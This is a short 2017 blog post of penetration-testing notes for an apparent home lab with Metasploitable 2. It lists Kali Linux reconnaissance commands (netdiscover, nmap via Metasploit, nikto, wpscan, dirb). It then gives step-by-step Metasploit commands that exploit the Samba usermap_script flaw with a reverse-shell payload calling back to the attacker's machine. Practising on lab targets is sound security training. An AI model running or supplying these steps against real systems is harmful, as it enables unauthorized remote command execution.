Friday, April 21, 2017

Kali Linux Refresher

Kali Linux Refresher
how to discover target
===========================
*don't know ip address yet
===========================
>netdiscover -r ipaddress
>netdiscover only
Note : Mac Vendor with CADMUS COMPUTER SYSTEMS are the target
 list target
 192.168.1.241 Metasploitable 2 linux
 192.168.1.236
 192.168.1.120

web.archived.org

===========================
Run nmap in metaexploit
===========================
>msfconsole
>db_status(check if status is connected)
>workspace
>msfdb init(enrypt database)
>msfdb
>service postgresql status(if active)
open another metaexploit terminal
>msfconsole
>workspace -a refresher(to add)
>workspace
target ip now
>db_nmap -v -sV -A -O 192.168.1.236
Open another terminal
>nikto -host http://192.168.1.236
 note: find cgi-bin
 open browser and type 192.168.1.236/cgi-bin
 review nikto logs where u can find exploitable details from directory

---Scanning tools------
vega
nikto
openvas

===========================
to test wordpress
===========================
open another terminal
>wpscan --url http://192.168.1.236/wordpress


======================================================
check all active directory folder from server(solution secure apache server)
======================================================
>dirb http://192.168.1.236

==============================================
Samba Username map script Command execution
==============================================
>use exploit/multi/samba/usermap_script
>show options
>set RHOST <Target IP>
>show payloads
>set PAYLOAD cmd/unix/reverse
>show options
>set LHOST <Kali IP>
>exploit
you can now execute shell linux commands
>-
>id

Note:
search addtional
exploitable linux guid
www.vulnhub.com()

No comments:

Post a Comment